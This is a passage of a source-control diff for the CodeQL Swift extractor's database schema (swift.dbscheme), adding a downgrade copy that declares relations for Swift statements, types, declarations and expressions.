@pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| 
@labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +for_each_stmt_variables( //dir=stmt + int id: @for_each_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( 
//dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: @repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] 
+any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + +#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + 
int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: @parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: 
int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type +); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + 
+unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: @unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( 
//dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + +enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = 
+ @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + +@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme new file mode 100644 index 00000000000..44c4818a898 --- /dev/null +++ b/swift/downgrades/33db81ad4b606ff9a476c8dabeb9fffbf61aa829/swift.dbscheme 
@@ -0,0 +1,2786 @@ +// generated by codegen/codegen.py, do not edit + +// from prefix.dbscheme +/** + * The source location of the snapshot. + */ +sourceLocationPrefix( + string prefix: string ref +); + + +// from schema.py + +@element = + @file +| @generic_context +| @locatable +| @location +| @type +; + +#keyset[id] +element_is_unknown( + int id: @element ref +); + +@file = + @db_file +; + +#keyset[id] +files( + int id: @file ref, + string name: string ref +); + +#keyset[id] +file_is_successfully_extracted( + int id: @file ref +); + +@locatable = + @argument +| @ast_node +| @comment +| @diagnostics +| @error_element +; + +#keyset[id] +locatable_locations( + int id: @locatable ref, + int location: @location_or_none ref +); + +@location = + @db_location +; + +#keyset[id] +locations( + int id: @location ref, + int file: @file_or_none ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +@ast_node = + @availability_info +| @availability_spec +| @callable +| @case_label_item +| @condition_element +| @decl +| @expr +| @key_path_component +| @macro_role +| @pattern +| @stmt +| @stmt_condition +| @type_repr +; + +comments( + unique int id: @comment, + string text: string ref +); + +db_files( + unique int id: @db_file +); + +db_locations( + unique int id: @db_location +); + +diagnostics( + unique int id: @diagnostics, + string text: string ref, + int kind: int ref +); + +@error_element = + @error_expr +| @error_type +| @overloaded_decl_ref_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_chain_result_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @unresolved_type +| @unresolved_type_conversion_expr +| @unspecified_element +; + +availability_infos( + unique int id: @availability_info +); + +#keyset[id] +availability_info_is_unavailable( + int id: @availability_info ref +); + +#keyset[id, index] +availability_info_specs( + int id: 
@availability_info ref, + int index: int ref, + int spec: @availability_spec_or_none ref +); + +@availability_spec = + @other_availability_spec +| @platform_version_availability_spec +; + +@callable = + @closure_expr +| @function +; + +#keyset[id] +callable_names( + int id: @callable ref, + string name: string ref +); + +#keyset[id] +callable_self_params( + int id: @callable ref, + int self_param: @param_decl_or_none ref +); + +#keyset[id, index] +callable_params( + int id: @callable ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +#keyset[id] +callable_bodies( + int id: @callable ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +callable_captures( + int id: @callable ref, + int index: int ref, + int capture: @captured_decl_or_none ref +); + +key_path_components( + unique int id: @key_path_component, + int kind: int ref, + int component_type: @type_or_none ref +); + +#keyset[id, index] +key_path_component_subscript_arguments( + int id: @key_path_component ref, + int index: int ref, + int subscript_argument: @argument_or_none ref +); + +#keyset[id] +key_path_component_tuple_indices( + int id: @key_path_component ref, + int tuple_index: int ref +); + +#keyset[id] +key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: 
@unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: 
@protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + 
+@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + 
+initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: 
@var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] 
+param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref 
